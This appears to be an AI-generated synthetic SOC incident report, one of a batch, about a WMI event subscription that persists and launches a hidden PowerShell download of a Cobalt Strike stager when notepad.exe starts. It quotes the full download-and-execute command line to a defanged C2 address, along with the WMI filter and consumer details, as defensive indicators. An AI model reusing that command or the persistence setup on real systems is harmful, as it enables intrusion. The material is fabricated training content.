Sysmon Alert Details
Alert ID: SYSMON-EVENT-TRIGGER-1546-7842
Alert Time: 2024-02-16 10:30:15 EST
Severity: HIGH (85/100)
Source: Sysmon (Event ID 1 – Process Creation)
Rule: “WMI Event Subscription – Suspicious Command Line”
MITRE ATT&CK: T1546.003 – Event Triggered Execution: WMI Event Subscription
Alert Details:
Event ID: 1 (Process Creation) – WMI Event Subscription
Time: 10:25 EST
Host: DEV-WS-089 (Development Workstation)
User: SYSTEM (via WMI)
Process Tree:
– Parent: WmiPrvSE.exe (PID: 784)
– Process: powershell.exe (PID: 4789)
– Command Line: powershell -WindowStyle Hidden -Command “Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; powershell -ExecutionPolicy Bypass -File %temp%\update.ps1”
WMI Event Subscription Details:
– Namespace: root\subscription
– Filter: __EventFilter
– Name: “ProcessStartFilter”
– Query: “SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName=’notepad.exe'”
– Consumer: ActiveScriptEventConsumer
– Name: “PowerShellConsumer”
– Script: powershell -WindowStyle Hidden -Command “Invoke-WebRequest -Uri http://185.143.221[.]89/update.ps1 -OutFile %temp%\update.ps1; …”
– Binding: __FilterToConsumerBinding
Detection Logic:
– WMI event subscription created to trigger when notepad.exe starts
– Triggers PowerShell download of malicious script
– WMI subscriptions rare on workstations
– Not triggered by user interaction
Additional Context:
– Subscription created at 10:20 EST
– No legitimate use of WMI event subscriptions on this host
– User had previously clicked phishing link
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon events
Splunk, Sysmon Logs
Confirmed WMI event subscription
2. Subscription Removal
Remove WMI subscription
PowerShell, wbemtest
WMI filter, consumer, binding removed
3. Script Analysis
Analyze update.ps1
CrowdStrike Sandbox
Script downloads Cobalt Strike beacon
4. Host Scan
Check for other malware
CrowdStrike
No other persistence found
5. User Interview
Contact user
Teams, Phone
User clicked phishing link earlier
6. Threat Hunting
Check other hosts for same subscription
Splunk, Sysmon
No other hosts affected
Jira Incident Report
Ticket: SOC-2024-085
Summary: T1546 – WMI Event Subscription for Persistence
Status: RESOLVED
Resolution: MALICIOUS – Subscription Removed
Priority: P2 – MEDIUM
Labels: T1546, event-triggered-execution, wmi, persistence, sysmon
Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1 (Process Creation via WMI).
Alert: “WMI Event Subscription – Suspicious Command Line”.
Host: DEV-WS-089 (Development Department).
Time: 2024-02-16 10:30 EST.
Technique: MITRE ATT&CK T1546.003 – Event Triggered Execution: WMI Event Subscription.
2. Technical Analysis:
Attack Chain:
09:30 – User clicks phishing link earlier
09:35 – Malicious script runs, installs WMI event subscription
09:40 – WMI subscription created
10:25 – User opens notepad.exe (unrelated)
10:25 – WMI subscription triggers PowerShell
10:25 – PowerShell downloads update.ps1 from 185.143.221[.]89
10:30 – Sysmon detects PowerShell from WmiPrvSE.exe
WMI Subscription Details:
Trigger: Win32_ProcessStartTrace WHERE ProcessName=’notepad.exe’
Action: Run PowerShell script downloading malicious payload
Persistence: Survives reboots; triggers whenever notepad runs
Script Analysis:
update.ps1 (SHA256: c3d4e5f6…)
Downloads Cobalt Strike beacon from same C2
Beacon connects to 185.143.221[.]89:443
User Activity:
User clicked phishing link earlier (fake “security update”)
Downloaded and ran initial script
Was unaware of WMI subscription
3. Investigation Findings:
Timeline:
09:30 – User clicks phishing link
09:35 – Initial script runs
09:40 – WMI subscription created
10:25 – User opens notepad.exe (normal work)
10:25 – PowerShell triggers, downloads payload
10:30 – Sysmon alerts
10:32 – SOC investigates
10:35 – WMI subscription removed
Indicators of Compromise (IoCs):
WMI:
– Filter: ProcessStartFilter
– Consumer: PowerShellConsumer
– Query: SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName=’notepad.exe’
Network:
– C2: 185.143.221[.]89:443
– Download URL: http://185.143.221[.]89/update.ps1
Files:
– update.ps1 (SHA256: c3d4e5f6…)
4. Containment Actions:
Immediate Actions:
Removed WMI event subscription using PowerShell.
Deleted any downloaded scripts.
Isolated host temporarily.
Blocked C2 IP at firewall.
Host Remediation:
Full scan (no other malware).
No reimage needed.
User Remediation:
Password reset.
Educated on phishing risks.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link, leading to initial compromise.
Contributing Factors:
WMI event subscriptions allowed (no restrictions).
No monitoring for WMI subscriptions (until Sysmon).
User lacked recent training.
6. Business Impact:
Operational Impact: Developer workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
WMI subscription removed.
Host cleaned.
User educated.
C2 blocked.
Technical Controls Enhanced:
Created SIEM alert for any new WMI event subscriptions.
Restricted WMI access via GPO.
Deployed PowerShell logging for WMI activities.
8. Conclusion:
An attacker used a WMI event subscription to establish persistence, triggering a PowerShell download whenever the user opened notepad.exe. Sysmon detected the anomalous process creation, enabling rapid removal before the payload could fully execute.
Closure Rationale: WMI subscription removed; host cleaned; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-16 11:30 EST
End of Batch 9
Ready for your next batch of prompts whenever you are.
Batch 10: Privilege Escalation & Defense Evasion Incident Reports
Here are the next 5 detailed SOC incident reports.